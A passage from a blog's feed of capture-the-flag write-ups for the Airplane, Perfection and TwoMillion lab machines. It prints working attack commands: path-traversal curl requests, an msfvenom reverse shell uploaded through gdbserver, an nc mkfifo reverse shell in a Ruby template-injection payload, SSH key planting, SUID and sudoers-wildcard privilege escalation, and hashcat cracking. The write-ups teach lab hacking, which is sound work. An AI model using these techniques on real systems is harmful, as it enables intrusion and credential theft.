&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;page&amp;#39;&lt;/span> &lt;span style="color:#fe8019">in&lt;/span> request&lt;span style="color:#fe8019">.&lt;/span>args:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> page &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;static/&amp;#39;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> request&lt;span style="color:#fe8019">.&lt;/span>args&lt;span style="color:#fe8019">.&lt;/span>get(&lt;span style="color:#b8bb26">&amp;#39;page&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> os&lt;span style="color:#fe8019">.&lt;/span>path&lt;span style="color:#fe8019">.&lt;/span>isfile(page):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> resp &lt;span style="color:#fe8019">=&lt;/span> send_file(page)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> resp&lt;span style="color:#fe8019">.&lt;/span>direct_passthrough &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">False&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> os&lt;span style="color:#fe8019">.&lt;/span>path&lt;span style="color:#fe8019">.&lt;/span>getsize(page) &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#d3869b">0&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> resp&lt;span style="color:#fe8019">.&lt;/span>headers[&lt;span style="color:#b8bb26">&amp;#34;Content-Length&amp;#34;&lt;/span>]&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fabd2f">str&lt;/span>(&lt;span style="color:#fabd2f">len&lt;/span>(resp&lt;span style="color:#fe8019">.&lt;/span>get_data()))
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> resp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">else&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Page not found&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">else&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> redirect(&lt;span style="color:#b8bb26">&amp;#39;http://airplane.thm:8000/?page=index.html&amp;#39;&lt;/span>, code&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">302&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>@app.route(&lt;span style="color:#b8bb26">&amp;#39;/airplane&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">airplane&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> render_template(&lt;span style="color:#b8bb26">&amp;#39;airplane.html&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> __name__ &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;__main__&amp;#39;&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> app&lt;span style="color:#fe8019">.&lt;/span>run(host&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;0.0.0.0&amp;#39;&lt;/span>, port&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">8000&lt;/span>)
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Nothing interesting in there either.
Then I tried to look into the &lt;code>/proc/sched_debug&lt;/code> to get information about the running processes.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>curl --path-as-is &lt;span style="color:#b8bb26">&amp;#39;10.10.121.174:8000/?page=../../../../../../proc/sched_debug&amp;#39;&lt;/span> --silent --output - | sed -e &lt;span style="color:#b8bb26">&amp;#39;s/\x0/\n/g&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>It generates a long output of all the running processes. After skimming through it I found some python processes:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729181205.webp" alt="">&lt;p>We can check what the command is by using the pid of the process:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>curl --path-as-is &lt;span style="color:#b8bb26">&amp;#39;10.10.121.174:8000/?page=../../../../../../proc/$PID/cmdline&amp;#39;&lt;/span> --silent --output - | sed -e &lt;span style="color:#b8bb26">&amp;#39;s/\x0/\n/g&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Nothing important there, its our flask app&lt;/p>
&lt;p>I also saw a &lt;code>gdbserver&lt;/code> instance in there.
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729181459.webp" alt="">&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>curl --path-as-is &lt;span style="color:#b8bb26">&amp;#39;10.10.121.174:8000/?page=../../../../../../proc/527/cmdline&amp;#39;&lt;/span> --silent --output - | sed -e &lt;span style="color:#b8bb26">&amp;#39;s/\x0/\n/g&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>/usr/bin/gdbserver
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>0.0.0.0:6048
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>airplane
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The &lt;code>gdbserver&lt;/code> is running on port 6048. I tried some searching and found out that if remote debugging is enabled in gdb, we can upload a reverse shell and execute it.
&lt;a href="https://book.hacktricks.xyz/network-services-pentesting/pentesting-remote-gdbserver">https://book.hacktricks.xyz/network-services-pentesting/pentesting-remote-gdbserver&lt;/a>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Generate the payload using msfvenom&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>msfvenom -p linux/x64/shell_reverse_tcp LHOST&lt;span style="color:#fe8019">=&lt;/span>tun0 LPORT&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">1234&lt;/span> PrependFork&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fabd2f">true&lt;/span> -f elf -o binary.elf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>chmod +x ./binary.elf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># open gdb&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>gdb ./binary.elf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>target extended-remote 10.10.121.174:6048
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>remote put binary.elf /dev/shm/binary.elf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">set&lt;/span> remote exec-file /dev/shm/binary.elf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>run
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>
&lt;blockquote>
&lt;p>NOTE: If you are using &lt;code>peda&lt;/code>, &lt;code>gef&lt;/code> or any other gdb enhancement tools, start gdb using the -nx flag
otherwise it cause some error when using remote debugging: &lt;code>gdb -nx ./binary.elf&lt;/code>&lt;/p>
&lt;/blockquote>
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729183159.webp" alt="">&lt;p>Got shell.&lt;/p>
&lt;blockquote>
&lt;p>Check out &lt;a href="https://github.com/hanslub42/rlwrap">rlwrap&lt;/a>
It can be used with commands like &lt;code>nc&lt;/code> to be able to use the arrow keys for editing and accessing the command history etc. in a limited shell environment.&lt;/p>
&lt;/blockquote>
&lt;p>I added an ssh key to hudson&amp;rsquo;s home directory anyway&amp;hellip;&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ssh-keygen -t ed25519 -N &lt;span style="color:#b8bb26">&amp;#39;&amp;#39;&lt;/span> -f ./ctf
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>This command will generate 2 files - &lt;code>ctf&lt;/code> and &lt;code>ctf.pub&lt;/code>.
&lt;code>ctf&lt;/code> is the private key that we use to log in and &lt;code>ctf.pub&lt;/code> contains the public key that we copy to the machine.
Copy the content of the &lt;code>ctf.pub&lt;/code> file to &lt;code>/home/hudson/.ssh/authoried_keys&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;ssh-...&amp;#39;&lt;/span> &amp;gt; /home/hudson/.ssh/authorized_keys
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now we can login as hudson through ssh&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>chmod &lt;span style="color:#d3869b">600&lt;/span> ctf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ssh hudson@airplane.thm -i ctf
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h1 id="lateral-movement-to-carlos">Lateral Movement to carlos&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;p>Finding SUID binaries&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>find / -type f -perm -u&lt;span style="color:#fe8019">=&lt;/span>s -exec ls -alp &lt;span style="color:#fe8019">{}&lt;/span> &lt;span style="color:#b8bb26">\;&lt;/span> 2&amp;gt;/dev/null
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>
&lt;blockquote>
&lt;p>SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges.
To learn more about Privilege Escalation using SUID binaries checkout &lt;a href="https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/">this article&lt;/a>&lt;/p>
&lt;/blockquote>
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729184219.webp" alt="">&lt;h2 id="lateral-movement">Lateral Movement&lt;/h2>
&lt;p>We can use the &lt;code>-exec&lt;/code> argument in the &lt;code>find&lt;/code> command to execute commands as user carlos.
So to gain shell access as carlos we just need to run:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>find -exec bash -ip &lt;span style="color:#b8bb26">\;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729184608.webp" alt="">&lt;p>I put the ssh key into carlos as well. SSH is better.&lt;/p>
&lt;hr>
&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729190926.webp" alt="">&lt;p>It means that we can run ruby scripts using &lt;code>/usr/bin/ruby&lt;/code> with sudo without using password. But it also ensures that we can only run
scripts located inside the &lt;code>/root/&lt;/code> directory. And to check whether the givin script is present in the &lt;code>/root&lt;/code> directory they uses &lt;code>*&lt;/code> character.
We can bypass this check easily because we can replace the &lt;code>*&lt;/code> with any character we want, and we can exploit it similiarly to a path traversal attack.
For that we create a ruby script in &lt;code>/tmp&lt;/code> or any other directory and when running it we use relative path to that of the &lt;code>/root&lt;/code> directory.
For example &lt;code>/tmp/shell.rb&lt;/code> becomes &lt;code>/root/../tmp/shell.rb&lt;/code>. Note that this matches the &lt;code>/root/*.rb&lt;/code> check in the sudoers file.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;system(&amp;#34;/bin/bash -ip&amp;#34;);&amp;#39;&lt;/span> &amp;gt; /tmp/shell.rb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>sudo /usr/bin/ruby /root/../tmp/shell.rb
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729191305.webp" alt="">&lt;p>If you want to learn more about this type of attacks, check out &lt;a href="https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-4-wildcards/">this article&lt;/a>&lt;/p>
&lt;hr>
&lt;h1 id="resources">Resources&lt;/h1>
&lt;ul>
&lt;li>&lt;a href="https://httpie.io/">httpie&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://www.daehee.com/blog/werkzeug-console-pin-exploit">Werkzeug Console PIN Exploit&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://0xffsec.com/handbook/web-applications/file-inclusion-and-path-traversal/#the-proc-file-system">The &lt;code>proc&lt;/code> File System&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://book.hacktricks.xyz/network-services-pentesting/pentesting-remote-gdbserver">Pentesting Remote GdbServer&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://github.com/hanslub42/rlwrap">rlwrap&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://gtfobins.github.io/gtfobins/find/">find - GTFOBins&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-4-wildcards/">Dangerous Sudoers Entries – PART 4: Wildcards&lt;/a>&lt;/li>
&lt;/ul></content></item><item><title>Perfection | HackTheBox</title><link>https://h4r1337.github.io/posts/perfection/</link><pubDate>Sun, 07 Jul 2024 11:34:41 +0530</pubDate><guid>https://h4r1337.github.io/posts/perfection/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/perfection/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Perfection">perfection&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/1412009">&lt;img src="https://www.hackthebox.com/badge/image/1412009" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Perfection
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>Perfection is an easy Linux machine that features a web application with functionality to calculate student scores. This application is vulnerable to Server-Side Template Injection (SSTI) via regex filter bypass. A foothold can be gained by exploiting the SSTI vulnerability. Enumerating the user reveals they are part of the &lt;code>sudo&lt;/code> group. Further enumeration uncovers a database with password hashes, and the user&amp;rsquo;s mail reveals a possible password format. Using a mask attack on the hash, the user&amp;rsquo;s password is obtained, which is leveraged to gain &lt;code>root&lt;/code> access.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/perfection/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Perfection">perfection&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/1412009">&lt;img src="https://www.hackthebox.com/badge/image/1412009" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Perfection
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>Perfection is an easy Linux machine that features a web application with functionality to calculate student scores. This application is vulnerable to Server-Side Template Injection (SSTI) via regex filter bypass. A foothold can be gained by exploiting the SSTI vulnerability. Enumerating the user reveals they are part of the &lt;code>sudo&lt;/code> group. Further enumeration uncovers a database with password hashes, and the user&amp;rsquo;s mail reveals a possible password format. Using a mask attack on the hash, the user&amp;rsquo;s password is obtained, which is leveraged to gain &lt;code>root&lt;/code> access.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Scanned all TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>nmap -p- -vv -Pn -T4 --min-rate &lt;span style="color:#d3869b">1000&lt;/span> -oA nmap/ports 10.10.11.253
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.11.253
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received user-set &lt;span style="color:#fe8019">(&lt;/span>0.17s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-05-03 16:40:54 IST &lt;span style="color:#fe8019">for&lt;/span> 85s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">64836&lt;/span> closed ports, &lt;span style="color:#d3869b">697&lt;/span> filtered ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Reason: &lt;span style="color:#d3869b">64836&lt;/span> conn-refused and &lt;span style="color:#d3869b">697&lt;/span> no-responses
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Enumerated open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>nmap -p22,80 -sC -sV --min-rate &lt;span style="color:#d3869b">1000&lt;/span> -Pn -vv -oA nmap/service 10.10.11.253
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.11.253
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received user-set &lt;span style="color:#fe8019">(&lt;/span>0.20s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-05-03 16:44:53 IST &lt;span style="color:#fe8019">for&lt;/span> 15s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack nginx
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-methods:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Supported Methods: GET HEAD
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: Weighted Grade Calculator
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h2 id="port-80---http-webrick-170">Port 80 - HTTP (WEBrick &lt;code>1.7.0&lt;/code>)&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/perfection/port-80.webp" alt="">&lt;h4 id="weighted-grade">&lt;code>/weighted-grade&lt;/code>&lt;/h4>
&lt;img src="https://h4r1337.github.io/img/perfection/weighted-grade.webp" alt="">&lt;p>Let&amp;rsquo;s fuzz all these inputs.&lt;/p>
&lt;hr>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="ssti">SSTI&lt;/h2>
&lt;p>After some trial and error through burp repeater I found that we can enter ruby SSTI
payloads to exploit this. But the server is blocking malicious inputs - maybe there&amp;rsquo;s
some regex in the backend stopping our inputs?&lt;/p>
&lt;img src="https://h4r1337.github.io/img/perfection/ssti.webp" alt="">&lt;p>Entering a new line character &lt;code>%0a&lt;/code> before the payload seems to solve the issue
&lt;img src="https://h4r1337.github.io/img/perfection/ssti-bypass.webp" alt="">&lt;/p>
&lt;p>Now we can use the SSTI to send a rever shell payload to the server to get initial access.
I used &lt;code>nc - mkfifo&lt;/code> payload for the reverse shell (works almost always).&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-ruby" data-lang="ruby">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">&amp;lt;%=&lt;/span> &lt;span style="color:#fabd2f">system&lt;/span>(&lt;span style="color:#b8bb26">&amp;#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&amp;gt;&amp;amp;1|nc 10.10.14.41 1234 &amp;gt;/tmp/f&amp;#39;&lt;/span>) &lt;span style="color:#fe8019">%&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/perfection/shell.webp" alt="">&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;p>I created a ssh key and inserted the public key into &lt;code>/home/susan/.ssh/authorized_keys&lt;/code>. Now we can access an interactive shell through ssh.&lt;/p>
&lt;p>After some enumeration found this database file:
&lt;img src="https://h4r1337.github.io/img/perfection/local-enum.webp" alt="">&lt;/p>
&lt;p>Downloaded the file into my machine using python simple http server and inside the db found these passwords:
&lt;img src="https://h4r1337.github.io/img/perfection/credentials.webp" alt="">&lt;/p>
&lt;p>Another important finding: &lt;code>/var/mail/susan&lt;/code>
&lt;img src="https://h4r1337.github.io/img/perfection/mail.webp" alt="">
We can use this info and &lt;strong>&lt;a href="https://hashcat.net/wiki/doku.php?id=mask_attack">hashcat mask&lt;/a>&lt;/strong> attack to find the password.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>hashcat -m &lt;span style="color:#d3869b">1400&lt;/span> susan.hash -a &lt;span style="color:#d3869b">3&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;susan_nasus_?d?d?d?d?d?d?d?d?d&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/perfection/hashcat.webp" alt="">&lt;h2 id="privilege-escalation-1">Privilege Escalation&lt;/h2>
&lt;p>That was easy&amp;hellip;
&lt;img src="https://h4r1337.github.io/img/perfection/root.webp" alt="">&lt;/p>
&lt;hr></content></item><item><title>TwoMillion | HackTheBox</title><link>https://h4r1337.github.io/posts/two-million/</link><pubDate>Wed, 26 Jul 2023 21:58:49 +0530</pubDate><guid>https://h4r1337.github.io/posts/two-million/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/two-million/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/TwoMillion">TwoMillion&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Makers&lt;/td>
